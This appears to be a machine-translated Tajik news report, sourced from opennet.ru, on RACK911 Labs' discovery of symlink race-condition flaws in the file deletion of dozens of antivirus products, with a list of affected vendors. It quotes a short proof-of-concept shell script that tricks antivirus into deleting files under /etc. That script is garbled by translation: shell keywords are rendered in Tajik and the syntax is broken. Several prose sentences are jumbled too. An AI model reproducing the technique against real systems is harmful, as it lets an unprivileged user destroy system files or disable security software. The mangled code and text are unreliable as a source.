Муҳаққиқон аз RACK911 Labs ки қариб ҳамаи бастаҳои антивирусӣ барои Windows, Linux ва macOS ба ҳамлаҳое, ки шароити нажодро ҳангоми ҳазфи файлҳое, ки дар онҳо нармафзори зараровар ошкор шудааст, идора мекунанд, осебпазир буданд.
Барои анҷом додани ҳамла, шумо бояд файлеро бор кунед, ки антивирус ҳамчун зараровар эътироф мекунад (масалан, шумо метавонед имзои санҷиширо истифода баред) ва пас аз вақти муайян, пас аз антивирус файли зарароварро ошкор мекунад, аммо фавран пеш аз даъват кардани функсия барои нест кардани он, директорияро бо файли пайванди рамзӣ иваз кунед. Дар Windows, барои ба даст овардани ҳамон таъсир, иваз кардани директория бо истифода аз пайванди директория анҷом дода мешавад. Мушкилот дар он аст, ки қариб ҳама антивирусҳо истинодҳои рамзиро дуруст тафтиш накарданд ва бо боварии он ки онҳо файли зарароварро нест мекунанд, файлро дар директорияе, ки истиноди рамзӣ ба он ишора мекунад, нест карданд.
Дар Linux ва macOS нишон дода шудааст, ки чӣ тавр корбари беимтиёз метавонад /etc/passwd ё ягон файли дигари системаро нест кунад ва дар Windows китобхонаи DDL-и антивирус барои бастани кори он (дар Windows ҳамла танҳо бо нест кардани он маҳдуд аст) файлҳое, ки ҳоло аз ҷониби дигар замимаҳо истифода намешаванд). Масалан, ҳамлакунанда метавонад феҳристи "exploit" эҷод кунад ва файли EpSecApiLib.dll-ро бо имзои вируси санҷишӣ ба он бор кунад ва сипас директорияи "exploit" -ро бо истиноди "C:\Program Files (x86)\McAfee" иваз кунад. Endpoint Security\Endpoint Security" пеш аз нест кардани он Платформа", ки боиси нест кардани китобхонаи EpSecApiLib.dll аз каталоги антивирус мегардад. Дар Linux ва macos, ҳиллаи шабеҳро метавон тавассути иваз кардани директория бо истиноди "/ etc" анҷом дод.
#! / bin / sh
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
дар ҳоле ки inotifywait -m “/home/user/exploit/passwd” | grep -m 5 "КУШОДА"
do
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
иҷро
Ғайр аз он, бисёре аз барномаҳои антивирусӣ барои Linux ва macOS пайдо шуданд, ки ҳангоми кор бо файлҳои муваққатӣ дар феҳристҳои /tmp ва /private/tmp номҳои пешгӯишавандаи файлро истифода мебаранд, ки онҳоро метавон барои баланд бардоштани имтиёзҳо ба корбари реша истифода бурд.
Дар айни замон, мушкилот аллакай аз ҷониби аксари таъминкунандагон ҳал карда шудаанд, аммо қобили таваҷҷӯҳ аст, ки аввалин огоҳиномаҳо дар бораи мушкилот ба истеҳсолкунандагон дар тирамоҳи соли 2018 фиристода шуданд. Гарчанде ки на ҳама фурӯшандагон навсозиҳоро интишор кардаанд, ба онҳо ҳадди аққал 6 моҳ вақт дода шудааст ва RACK911 Labs боварӣ дорад, ки ҳоло ошкор кардани осебпазирӣ ройгон аст. Қайд карда мешавад, ки RACK911 Labs муддати тӯлонӣ барои муайян кардани осебпазирӣ кор мекунад, аммо интизор набуд, ки кор бо ҳамкасбони саноати антивирус аз сабаби таъхир дар нашри навсозиҳо ва нодида гирифтани зарурати ислоҳи таъҷилии амният ин қадар душвор хоҳад буд. мушкилот.
Маҳсулоти зарардида (бастаи антивируси ройгони ClamAV дар рӯйхат нест):
- Linux
- BitDefender GravityZone
- Амнияти Comodo Endpoint
- Амнияти Eset File Server
- F-амнияти Linux
- Амнияти Kaspersy Endpoint
- Амнияти McAfee Endpoint
- Антивируси Sophos барои Linux
- Windows
- Антивируси Avast Free
- Антивируси Free Avira
- BitDefender GravityZone
- Амнияти Comodo Endpoint
- F-Secure ҳифзи компютер
- FireEye Endpoint Security
- Intercept X (Софос)
- Амнияти Kaspersky Endpoint Security
- Malwarebytes барои Windows
- Амнияти McAfee Endpoint
- Равоқи панда
- Webroot дар ҳама ҷо бехатар аст
- MacOS
- AVG
- Амнияти BitDefender
- Eset Cyber Security
- Security Internet Kaspersky
- Ҳифзи умумии McAfee
- Microsoft Defender (BETA)
- Norton Security
- Sophos Home
- Webroot дар ҳама ҷо бехатар аст
Манбаъ: opennet.ru